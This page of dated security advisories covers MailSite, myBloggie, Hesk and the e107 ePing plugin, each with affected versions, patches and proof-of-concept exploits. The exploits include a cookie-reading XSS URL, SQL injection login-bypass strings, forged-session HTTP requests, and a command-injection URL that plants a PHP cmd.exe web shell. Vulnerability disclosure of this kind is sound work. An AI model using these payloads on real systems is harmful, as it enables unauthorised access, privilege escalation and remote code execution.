I am Moving!
I am moving, the reincarnated website can be found athttp://rahulmohandas.wordpress.com/
ABSTRACT
This paper attempts to document an approach on how the hackers make use of the vulnerabilities to install malicious software on the vulnerable machine. A comprehensive reverse code engineered analysis of the malicious software (Win32.Qucan.a) and the various protection schemes against the worm by various security products are also discussed.
I hope this document will help the Malware researchers, Intrusion Analysts and other Security professionals to conduct a more viable and comprehensive research.
The complete paper can be downloaded from
http://geocities.com/rahulmohandas/hacking_the_malware.pdf
MD5: F875DADCAD00792D753CC96BD57E0F72
or
OS2A ID: OS2A_1004 Status
01/06/2006 Issue Discovered
01/06/2006 Reported to the vendor
01/19/2006 Patch Released
01/20/2006 Advisory Released
Class: Denial of Service / Script Injection Severity: CRITICAL
Overview:
Rockliffe's MailSite is a program for providing access to email
accounts on Microsoft Windows operating systems. MailSite HTTP Mail management
agent could allow a remote attacker to cause a denial of service or
execute arbitrary script code.
Description:
1. MailSite HTTP Mail management agent 7.0.3.1 version could allow a remote
attacker cause a denial of service. A bug in the input validation routine
in httpma causes the svchost process to consume more CPU cycles thus
impacting Mailsite HTTP Management agent and ultimately crashing the service.
2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote
attacker to inject arbitrary script code. This vulnerability is caused
due to a design error in the wconsole.dll. This dll file contains html
code embedded in it which is not properly sanitizing the user-input.
Impact:
1. Remote attackers can exploit this issue to trigger a denial of service
condition.
2. An attacker may leverage this issue to have arbitrary script code
executed in the browser in the context of the affected site.
Affected Software(s):
MailSite 7.0.3.1 and prior
MailSite 6.1.22 and prior
MailSite 5.x
Affected platform(s):
Windows (Any)
Exploit/Proof of Concept:
For 7.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd
Any special characters passed to the parameters in the wconsole.dll
triggers denial of service.
For 6.x & 5.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert
(document.cookie)%3C/script%3E
Solution:
For 7.x series apply the following patch.
ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/
Class: SQL Injection Severity: CRITICAL
Overview:
myBloggie is a Weblog system built using PHP & mySQL. myBloggie
versions2.1.3-beta and prior are vulnerable to SQL injection vulnerability
causedby improper validation of user-supplied inputs. This vulnerability
can be exploited to bypass authentication mechanism, escalate the
privileges toadministrator level and also made to reveal system
specific information.
Description:
User supplied credential inputs ('$username' and '$passwd') are not
sanitized in login.php before subjecting them to SQL query.
<-------------------login.php snippet----------------------------->
if (isset($_POST['username'])) {
$username=$_POST['username'];
} else $username="";
$result = mysql_query( "SELECT user FROM ".USER_TBL." WHERE user=
'$username' AND password='$passwd'" ) or error( mysql_error() );
<----------------------------------------------------------------->
This can be exploited in multiple ways,
1. Authentication Bypass
A malicious user can log on to the weblog system without submitting
thepassword by placing queries such as this "admin' OR 'x'='x" in
the User Name field.
2. Privilege Escalation.
When a non-administrative user submits, for example "user1' OR 'x'='x"
into the User Name field, administrative privileges will be granted.
3. Path Disclosure.
Path information can be made to disclose in error pages by passing
invalid query to User Name field of login.php.
Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information, or permit an attacker to
exploit vulnerabilities in the underlying database implementation.
An attacker can also exploit this vulnerability to elevate privileges
within the affected system.
Affected Systems:
myBloggie 2.1.3-beta and prior.
Linux (Any), Unix (Any), Windows (Any)
Exploit:
1. POST http://example.com/mybloggie/login.php?username=admin' OR
'x'='x
2. POST http://example.com/mybloggie/login.php?username=normal_user
' OR 'one'='one
3. POST http://example.com/mybloggie/login.php?username='1=1 --
Solution:
Patch: http://mywebland.com/forums/showtopic.php?t=399
Reference:
http://marc.theaimsgroup.com/?l=bugtraq&m=112607358831963&w=2
OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released
Class: Authentication Bypass Severity: CRITICAL
Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused due to improper validation of the HTTP
header. This vulnerability can be exploited to bypass authentication
mechanism, and also made to reveal system specific information.
Description:
Multiple vulnerabilities exist in Hesk ticket based support system.
1. Authentication Bypass
The 'PHPSESSID', Session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value to 'PHPSESSID' parameter and posting it to
admin.php. This Session ID can then be utilized to access administrative
control panel.
This is similar to a previously reported vulnerability where invalid
User ID and Password were submitted. In this case, a randomly chosen
Session ID is sent along with the login request.
2. Path Disclosure.
Path information can be made to disclose in error pages by passing invalid
metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.
Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information.
Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)
Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");
2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345")
OS2A ID: OS2A_1001 Status Published: 08/04/2005
Updated : 08/05/2005
Patch Released
Class: File Creation/Command Execution
Severity: CRITICAL
eTrace, another utility plugin for e107 has similar
vulnerabilities.
Description:
e107 portal's eping plugin 1.02 and prior is prone to remote
command execution vulnerability. This vulnerability exists
due to output redirection operators like '>', '|', '&' are
not being sanitized in eping_host,eping_count parameters in
the doping.php script.
eping_host has a validate function in functions.php which does
not consider the above mentioned case.
eping_count has no validation logic. It accepts the above
mentioned system meaningful characters.
Impact:
A remote user can execute any command using '|' character or
create a file with malicious executable code with '>' character.
Execution of arbitrary command or creation of arbitrary files
can lead to, Denial of service, Disclosure or modification of
system information or Execution of arbitrary code.
Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)
Exploit:
a.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd
.exe%94)?%3E%22%20%3Etest.php
b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2|dir
Solution:
Patch:
Upgrade to the version 1.03 of ePing and eTrace plugins.